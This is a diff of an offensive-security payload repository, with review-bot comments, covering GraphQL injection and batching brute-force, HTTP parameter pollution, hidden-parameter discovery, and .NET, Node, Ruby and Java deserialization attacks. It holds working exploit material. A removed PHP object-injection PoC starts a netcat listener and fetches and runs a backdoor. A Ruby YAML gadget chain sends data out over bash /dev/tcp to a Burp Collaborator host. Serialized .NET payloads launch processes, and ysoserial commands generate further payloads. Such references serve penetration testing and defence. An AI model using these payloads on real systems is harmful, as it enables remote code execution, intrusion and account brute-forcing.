@@ -167,6 +218,68 @@ Enumerate the definition of interesting types using the following GraphQL query,
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}} {__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
``` ```
### List path to reach a type
```php
$ git clone https://gitlab.com/dee-see/graphql-path-enum
$ graphql-path-enum -i ./test_data/h1_introspection.json -t Skill
Found 27 ways to reach the "Skill" node from the "Query" node:
- Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (embedded_submission_form) -> EmbeddedSubmissionForm (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (external_program) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (external_programs) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (job_listing) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (job_listings) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (me) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (pentest) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (pentests) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (query) -> Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (query) -> Query (skills) -> Skill
```
## Exploit
### Extract data
```js
example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
```
![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true)
### Extract data using edges/nodes
```json
{
"query": "query {
teams{
total_count,edges{
node{
id,_id,about,handle,state
}
}
}
}"
}
```
### Extract data using projections
:warning: Dont forget to escape the " inside the **options**.
```js
{doctors(options: "{\"patients.ssn\" :1}"){firstName lastName id patients{ssn}}}
```
### Use mutations ### Use mutations
Mutations work like function, you can use them to interact with the GraphQL. Mutations work like function, you can use them to interact with the GraphQL.
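Review bot: the List path to reach a type block is fenced as `php` but contains a shell session (`$ git clone https://gitlab.com/dee-see/graphql-path-enum`, `$ graphql-path-enum -i ./test_data/h1_introspection.json -t Skill`) followed by tool output; use `ps1` like the rest of the page or `bash`. The output says `Found 27 ways to reach the "Skill" node` but only 15 paths are listed, so add a trailing `...` or say the list is truncated. The edges/nodes example is fenced `json` but embeds raw newlines inside the `"query"` string, which is not valid JSON; either collapse the query onto one line or fence it as `js`. Minor: `Dont forget to escape the "` should be `Don't forget`.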
@@ -176,11 +289,69 @@ Mutations work like function, you can use them to interact with the GraphQL.
# mutation{addUser(id:"1", name:"Dan Abramov", email:"dan@dan.com") {id name email}} # mutation{addUser(id:"1", name:"Dan Abramov", email:"dan@dan.com") {id name email}}
``` ```
### GraphQL Batching Attacks
Common scenario:
* Password Brute-force Amplification Scenario
* Rate Limit bypass
* 2FA bypassing
#### JSON list based batching
> Query batching is a feature of GraphQL that allows multiple queries to be sent to the server in a single HTTP request. Instead of sending each query in a separate request, the client can send an array of queries in a single POST request to the GraphQL server. This reduces the number of HTTP requests and can improve the performance of the application.
Query batching works by defining an array of operations in the request body. Each operation can have its own query, variables, and operation name. The server processes each operation in the array and returns an array of responses, one for each query in the batch.
```json
[
{
"query":"..."
},{
"query":"..."
}
,{
"query":"..."
}
,{
"query":"..."
}
...
]
```
#### Query name based batching
```json
{
"query": "query { qname: Query { field1 } qname1: Query { field1 } }"
}
```
Send the same mutation several times using aliases
```js
mutation {
login(pass: 1111, username: "bob")
second: login(pass: 2222, username: "bob")
third: login(pass: 3333, username: "bob")
fourth: login(pass: 4444, username: "bob")
}
```
## Injections
> SQL and NoSQL Injections are still possible since GraphQL is just a layer between the client and the database.
### NOSQL injection ### NOSQL injection
Use `$regex`, `$ne` from []() inside a `search` parameter. Use `$regex`, `$ne` from []() inside a `search` parameter.
```json ```js
{ {
doctors( doctors(
options: "{\"limit\": 1, \"patients.ssn\" :1}", options: "{\"limit\": 1, \"patients.ssn\" :1}",
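Review bot: in Query name based batching, `"query": "query { qname: Query { field1 } qname1: Query { field1 } }"` treats `Query` as a field, which only works on a schema that exposes a root field literally named `Query`; the aliased `login` mutation below it is the realistic form, so either use a real field name (the page's own `doctors`, for instance) or say the example is schema-specific. The mutation example passes `pass: 1111` as an integer; if the schema declares the argument as `String!` the server rejects it, so quote the values. Wording: `Common scenario:` introduces three items (use `Common scenarios:`), and `2FA bypassing` reads better as `2FA bypass`. Worth one sentence as well: JSON-list batching is server-dependent and is often disabled, so the alias form is the fallback when the list form is rejected.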
@@ -194,6 +365,18 @@ Use `$regex`, `$ne` from []() inside a `search` parameter.
### SQL injection ### SQL injection
Send a single quote `'` inside a graphql parameter to trigger the SQL injection
```js
{
bacon(id: "1'") {
id,
type,
price
}
}
```
Simple SQL injection inside a graphql field. Simple SQL injection inside a graphql field.
```powershell ```powershell
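Review bot: `Send a single quote ' inside a graphql parameter to trigger the SQL injection` overstates what `bacon(id: "1'")` does: it provokes a database error (or a changed response), which is the detection step, not the injection itself. Suggest `to detect an SQL injection: an SQL syntax error in the response means the value reaches the query unescaped`, and pairing the probe with the error-free `id: "1''"` so readers can distinguish a quoting error from an unrelated 500.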
@@ -214,4 +397,10 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
* [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/) * [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/) * [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql) * [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/) * [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
* [Graphql Bug to Steal Anyones Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/)
* [GraphQL for Pentesters presentation by ACCEIS - 01/12/2022](https://acceis.github.io/prez-graphql/) - [source](https://github.com/Acceis/prez-graphql)
* [Exploiting GraphQL - Aug 29, 2021 - AssetNote - Shubham Shah](https://blog.assetnote.io/2021/08/29/exploiting-graphql/)
* [Building a free open source GraphQL wordlist for penetration testing - Nohé Hinniger-Foray - Aug 17, 2023](https://escape.tech/blog/graphql-security-wordlist/)
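Review bot: the new reference entries use three date formats (`Sept 1, 2019`, `DECEMBER 13, 2019`, `01/12/2022`, `Aug 17, 2023`) and are not in chronological order (the 2022 ACCEIS entry sits before the 2021 AssetNote one); normalise to the `Month D, YYYY` form used by the surrounding entries and sort them. `RENATAWALLARM` reads like a concatenated byline from the source page; split it or replace it with the site name.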


@@ -0,0 +1,58 @@
# HTTP Parameter Pollution
> HTTP Parameter Pollution (HPP) is a Web attack evasion technique that allows an attacker to craft a HTTP request in order to manipulate web logics or retrieve hidden information. This evasion technique is based on splitting an attack vector between multiple instances of a parameter with the same name (?param1=value&param1=value). As there is no formal way of parsing HTTP parameters, individual web technologies have their own unique way of parsing and reading URL parameters with the same name. Some taking the first occurrence, some taking the last occurrence, and some reading it as an array. This behavior is abused by the attacker in order to bypass pattern-based security mechanisms.
## Summary
* [Tools](#tools)
* [How to test](#how-to-test)
* [Table of reference](#table-of-reference)
* [References](#references)
## Tools
No tools needed. Maybe Burp or OWASP ZAP.
## How to test
HPP allows an attacker to bypass pattern based/black list proxies or Web Application Firewall detection mechanisms. This can be done with or without the knowledge of the web technology behind the proxy, and can be achieved through simple trial and error.
```
Example scenario.
WAF - Reads first param
Origin Service - Reads second param. In this scenario, developer trusted WAF and did not implement sanity checks.
Attacker -- http://example.com?search=Beth&search=' OR 1=1;## --> WAF (reads first 'search' param, looks innocent. passes on) --> Origin Service (reads second 'search' param, injection happens if no checks are done here.)
```
### Table of reference
When ?par1=a&par1=b
| Technology | Parsing Result |outcome (par1=)|
| ------------------ |--------------- |:-------------:|
| ASP.NET/IIS |All occurrences |a,b |
| ASP/IIS |All occurrences |a,b |
| PHP/Apache |Last occurrence |b |
| PHP/Zues |Last occurrence |b |
| JSP,Servlet/Tomcat |First occurrence |a |
| Perl CGI/Apache |First occurrence |a |
| Python Flask |First occurrence |a |
| Python Django |Last occurrence |b |
| Nodejs |All occurrences |a,b |
| Golang net/http - `r.URL.Query().Get("param")` |First occurrence |a |
| Golang net/http - `r.URL.Query()["param"]` |All occurrences in array |['a','b'] |
| IBM Lotus Domino |First occurrence |a |
| IBM HTTP Server |First occurrence |a |
| Perl CGI/Apache |First occurrence |a |
| mod_wsgi (Python)/Apache |First occurrence |a |
| Python/Zope |All occurrences in array |['a','b'] |
| Ruby on Rails |Last occurrence |b |
## References
- [HTTP Parameter Pollution - Imperva](https://www.imperva.com/learn/application-security/http-parameter-pollution/)
- [HTTP Parameter Pollution in 11 minutes | Web Hacking - PwnFunction](https://www.youtube.com/watch?v=QVZBl8yxVX0&ab_channel=PwnFunction)
- [How to Detect HTTP Parameter Pollution Attacks - Acunetix](https://www.acunetix.com/blog/whitepaper-http-parameter-pollution/)
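Review bot: the Table of reference has the row `| Perl CGI/Apache |First occurrence |a |` twice, and `PHP/Zues` is a typo for `PHP/Zeus` (the Zeus web server). The Summary lists Table of reference at the same level as How to test, but it is rendered as a `###` subsection of How to test; indent it in the Summary or promote the heading. Two small fixes to the prose: `craft a HTTP request` should be `an HTTP request`, and the example `http://example.com?search=Beth&search=' OR 1=1;##` should say the payload is URL-encoded in practice, since a bare `#` starts the fragment and everything after it never leaves the browser.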


@@ -0,0 +1,51 @@
# HTTP Hidden Parameters
> Web applications often have hidden or undocumented parameters that are not exposed in the user interface. Fuzzing can help discover these parameters, which might be vulnerable to various attacks.
## Summary
* [Tools](#tools)
* [Exploit](#exploit)
* [Bruteforce parameters](#bruteforce-parameters)
* [Old parameters](#old-parameters)
* [References](#references)
## Tools
* [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) - Burp extension to identify hidden, unlinked parameters.
* [s0md3v/Arjun](https://github.com/s0md3v/Arjun) - HTTP parameter discovery suite
* [Sh1Yo/x8](https://github.com/Sh1Yo/x8) - Hidden parameters discovery suite
* [tomnomnom/waybackurls](https://github.com/tomnomnom/waybackurls) - Fetch all the URLs that the Wayback Machine knows about for a domain
* [devanshbatham/ParamSpider](https://github.com/devanshbatham/ParamSpider) - Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing
## Exploit
### Bruteforce parameters
* Use wordlists of common parameters and send them, look for unexpected behavior from the backend.
```ps1
x8 -u "https://example.com/" -w <wordlist>
x8 -u "https://example.com/" -X POST -w <wordlist>
```
Wordlist examples:
- [Arjun/large.txt](https://github.com/s0md3v/Arjun/blob/master/arjun/db/large.txt)
- [Arjun/medium.txt](https://github.com/s0md3v/Arjun/blob/master/arjun/db/medium.txt)
- [Arjun/small.txt](https://github.com/s0md3v/Arjun/blob/master/arjun/db/small.txt)
- [samlists/sam-cc-parameters-lowercase-all.txt](https://github.com/the-xentropy/samlists/blob/main/sam-cc-parameters-lowercase-all.txt)
- [samlists/sam-cc-parameters-mixedcase-all.txt](https://github.com/the-xentropy/samlists/blob/main/sam-cc-parameters-mixedcase-all.txt)
### Old parameters
Explore all the URL from your targets to find old parameters.
* Browse the [Wayback Machine](http://web.archive.org/)
* Look through the JS files to discover unused parameters
## References
* [Hacker tools: Arjun The parameter discovery tool - 17TH MAY 2021 - Intigriti](https://blog.intigriti.com/2021/05/17/hacker-tools-arjun-the-parameter-discovery-tool/)
* [Parameter Discovery: A quick guide to start - 20/04/2022 - YesWeHack](https://blog.yeswehack.com/yeswerhackers/parameter-discovery-quick-guide-to-start/)
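Review bot: `Explore all the URL from your targets to find old parameters.` should read `all the URLs of your targets`. The Old parameters section points at the Wayback Machine and JS files but never uses the two archive tools listed under Tools (waybackurls, ParamSpider); a single command line such as `echo example.com | waybackurls | grep '?'` would connect the two sections. The x8 fences are tagged `ps1`, but the same commands run unchanged on Linux, so `bash` is the more accurate tag.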


@@ -0,0 +1,174 @@
# .NET Serialization
## Summary
* [Detection](#detection)
* [Tools](#tools)
* [Formatters](#formatters)
* [XmlSerializer](#xmlserializer)
* [DataContractSerializer](#datacontractserializer)
* [NetDataContractSerializer](#netdatacontractserializer)
* [LosFormatter](#losformatter)
* [JSON.NET](#jsonnet)
* [BinaryFormatter](#binaryformatter)
* [POP Gadgets](#pop-gadgets)
* [References](#references)
## Detection
* `AAEAAD` (Hex) = .NET deserialization BinaryFormatter
* `FF01` (Hex) / `/w` (Base64) = .NET ViewState
Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=`
## Tools
* [pwntester/ysoserial.net - Deserialization payload generator for a variety of .NET formatters](https://github.com/pwntester/ysoserial.net)
```ps1
$ cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s
$ ./ysoserial.exe -p DotNetNuke -m read_file -f win.ini
$ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
$ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
```
## Formatters
![NETNativeFormatters.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Insecure%20Deserialization/Images/NETNativeFormatters.png?raw=true)
.NET Native Formatters from [pwntester/attacking-net-serialization](https://speakerdeck.com/pwntester/attacking-net-serialization?slide=15)
### XmlSerializer
* In C# source code, look for `XmlSerializer(typeof(<TYPE>));`.
* The attacker must control the **type** of the XmlSerializer.
* Payload output: **XML**
```xml
.\ysoserial.exe -g ObjectDataProvider -f XmlSerializer -c "calc.exe"
<?xml version="1.0"?>
<root type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" >
<ExpandedElement/>
<ProjectedProperty0>
<MethodName>Parse</MethodName>
<MethodParameters>
<anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">
<![CDATA[<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:d="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:b="clr-namespace:System;assembly=mscorlib" xmlns:c="clr-namespace:System.Diagnostics;assembly=system"><ObjectDataProvider d:Key="" ObjectType="{d:Type c:Process}" MethodName="Start"><ObjectDataProvider.MethodParameters><b:String>cmd</b:String><b:String>/c calc.exe</b:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
</anyType>
</MethodParameters>
<ObjectInstance xsi:type="XamlReader"></ObjectInstance>
</ProjectedProperty0>
</ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>
```
### DataContractSerializer
> The DataContractSerializer deserializes in a loosely coupled way. It never reads common language runtime (CLR) type and assembly names from the incoming data. The security model for the XmlSerializer is similar to that of the DataContractSerializer, and differs mostly in details. For example, the XmlIncludeAttribute attribute is used for type inclusion instead of the KnownTypeAttribute attribute.
* In C# source code, look for `DataContractSerializer(typeof(<TYPE>))`.
* Payload output: **XML**
* Data **Type** must be user-controlled to be exploitable
### NetDataContractSerializer
> It extends the `System.Runtime.Serialization.XmlObjectSerializer` class and is capable of serializing any type annotated with serializable attribute as `BinaryFormatter`.
* In C# source code, look for `NetDataContractSerializer().ReadObject()`.
* Payload output: **XML**
```ps1
.\ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "calc.exe" -o base64 -t
```
### LosFormatter
* Use `BinaryFormatter` internally.
```ps1
.\ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -c "calc.exe" -o base64 -t
```
### JSON.NET
* In C# source code, look for `JsonConvert.DeserializeObject<Expected>(json, new JsonSerializerSettings`.
* Payload output: **JSON**
```ps1
.\ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc.exe" -t
{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
```
### BinaryFormatter
> The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. BinaryFormatter is insecure and cant be made secure.
* In C# source code, look for `System.Runtime.Serialization.Binary.BinaryFormatter`.
* Exploitation requires `[Serializable]` or `ISerializable` interface.
* Payload output: **Binary**
```ps1
./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
```
## POP Gadgets
These gadgets must have the following properties:
* Serializable
* Public/settable variables
* Magic "functions": Get/Set, OnSerialisation, Constructors/Destructors
You must carefully select your **gadgets** for a targeted **formatter**.
List of popular gadgets used in common payloads.
* **ObjectDataProvider** from `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll`
* Use `MethodParameters` to set arbitrary parameters
* Use `MethodName` to call an arbitrary function
* **ExpandedWrapper**
* Specify the `object types` of the objects that are encapsulated
```cs
ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
```
* **System.Configuration.Install.AssemblyInstaller**
* Execute payload with Assembly.Load
```cs
// System.Configuration.Install.AssemblyInstaller
public void set_Path(string value){
if (value == null){
this.assembly = null;
}
this.assembly = Assembly.LoadFrom(value);
}
```
## References
* [Attacking .NET Serialization - Alvaro - October 20, 2017](https://speakerdeck.com/pwntester/attacking-net-serialization?slide=11)
* [Attacking .NET Deserialization - Alvaro Muñoz - 28 avr. 2018](https://youtu.be/eDfGpu3iE4Q)
* [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - Slides](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
* [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - White Paper](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)
* [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - DEF CON 25 Conference](https://www.youtube.com/watch?v=ZBfBYoK_Wr0)
* [ARE YOU MY TYPE? Breaking .NET sandboxes through Serialization - James Forshaw - Slides](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_Slides.pdf)
* [ARE YOU MY TYPE? Breaking .NET sandboxes through Serialization - James Forshaw - White Paper](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf)
* [Now You Serial, Now You Don't - Systematically Hunting for Deserialization Exploits - ALYSSA RAHMANDEC](https://www.mandiant.com/resources/blog/hunting-deserialization-exploits)
* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili (@irsdl) - 04/2019](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
* [Bypassing .NET Serialization Binders - Markus Wulftange - June 28, 2022](https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html)
* [Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net) - hacktricks](https://book.hacktricks.xyz/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net)
* [Sitecore Experience Platform Pre-Auth RCE - CVE-2021-42237 - Nov 2, 2021 - Shubham Shah](https://blog.assetnote.io/2021/11/02/sitecore-rce/)
* [Finding a New DataContractSerializer RCE Gadget Chain - November 7, 2019 - dugisec](https://muffsec.com/blog/finding-a-new-datacontractserializer-rce-gadget-chain/)
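Review bot: the BinaryFormatter bullet tells readers to grep for `System.Runtime.Serialization.Binary.BinaryFormatter`, but that namespace does not exist; the type is `System.Runtime.Serialization.Formatters.Binary.BinaryFormatter`, and a source search for the path as written will find nothing. In the `AssemblyInstaller` snippet the `if (value == null)` branch sets `this.assembly = null` and then falls through to `Assembly.LoadFrom(value)` with a null argument; if that is a faithful quote of the framework setter, a comment saying so would stop readers from "fixing" it, otherwise it needs a `return` or an `else`. Also, in the quoted Microsoft warning, "cant be made secure" should read "can't be made secure".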

View File

@@ -1,32 +0,0 @@
<?php
/*
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
A simple PoC to exploit PHP Object Injections flaws and gain remote shell access.
Shouts to @jstnkndy @yappare for the assist!
NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
*/
print "==============================================================================\r\n";
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
print "==============================================================================\r\n";
print "[+] Generating serialized payload...[OK]\r\n";
print "[+] Launching reverse listener...[OK]\r\n";
system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');
class PHPObjectInjection
{
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}
$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
$url = $url . urlencode(serialize(new PHPObjectInjection));
print "[+] Sending exploit...[OK]\r\n";
print "[+] Dropping down to interactive shell...[OK]\r\n";
print "==============================================================================\r\n";
$response = file_get_contents("$url");
?>

View File

@@ -0,0 +1,5 @@
var y = {
rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });},
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
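Review bot: this file is a verbatim copy of the snippet under `### node-serialize` in the Node Deserialization README added in the same change (same `y` object, same `serialize.serialize(y)` call), so there are now two copies to keep in sync; either keep the README snippet only or have the README link to this file. If the standalone file stays, a header comment naming the package and version it applies to (`node-serialize` 0.0.4, per the README) and stating that the printed string still needs the trailing `()` described in the README's step 2 before it does anything on `unserialize()` would make it self-explanatory.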

View File

@@ -0,0 +1,19 @@
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'"
method_id: :resolve
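Review bot: the anchor `&1` is defined four times (on the `Net::BufferedIO`, `TarReader::Entry`, `Net::WriteAdapter` and `Gem::RequestSet` nodes) and no `*1` alias ever references it, so every definition is dead and YAML linters will flag the duplicates; drop the anchors or give each node a unique name. The `git_set` command also embeds a concrete `burpcollaborator.net` subdomain that will be stale for any reader; replace it with an obvious placeholder such as `<COLLABORATOR_HOST>` so copied payloads do not call back to someone else's instance. A one-line header comment stating which Ruby and RubyGems versions this chain was verified against would also save readers time, since the file currently gives no context at all.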

Binary file not shown.


View File

@@ -2,55 +2,67 @@
## Detection ## Detection
- "AC ED 00 05" in Hex - `"AC ED 00 05"` in Hex
- "rO0" in Base64 * `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol.
* `00 05`: STREAM_VERSION. The serialization version.
- `"rO0"` in Base64
- Content-type = "application/x-java-serialized-object" - Content-type = "application/x-java-serialized-object"
- "H4sIAAAAAAAAAJ" in gzip(base64) - `"H4sIAAAAAAAAAJ"` in gzip(base64)
## Exploit ## Tools
[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. ### Ysoserial
[frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
```java ```java
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin java -jar ysoserial.jar Groovy1 'ping 127.0.0.1' > payload.bin
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
``` ```
payload | author | dependencies | impact (if not RCE) **List of payloads included in ysoserial:**
------|--------|------ |------ ```ps1
BeanShell1 |@pwntester, @cschneider4711 |bsh:2.0b5 Payload Authors Dependencies
C3P0 |@mbechler |c3p0:0.9.5.2, mchange-commons-java:0.2.11 ------- ------- ------------
Clojure |@JackOfMostTrades |clojure:1.8.0 AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
CommonsCollections1 |@frohoff |commons-collections:3.1 C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
CommonsCollections2 |@frohoff |commons-collections4:4.0 Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
CommonsCollections3 |@frohoff |commons-collections:3.1 Clojure @JackOfMostTrades clojure:1.8.0
CommonsCollections4 |@frohoff |commons-collections4:4.0 CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1 CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections6 |@matthias_kaiser |commons-collections:3.1 CommonsCollections2 @frohoff commons-collections4:4.0
FileUpload1 |@mbechler |commons-fileupload:1.3.1, commons-io:2.4 | file uploading CommonsCollections3 @frohoff commons-collections:3.1
Groovy1 |@frohoff |groovy:2.3.9 CommonsCollections4 @frohoff commons-collections4:4.0
Hibernate1 |@mbechler| CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
Hibernate2 |@mbechler| CommonsCollections6 @matthias_kaiser commons-collections:3.1
JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
JRMPClient |@mbechler| FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
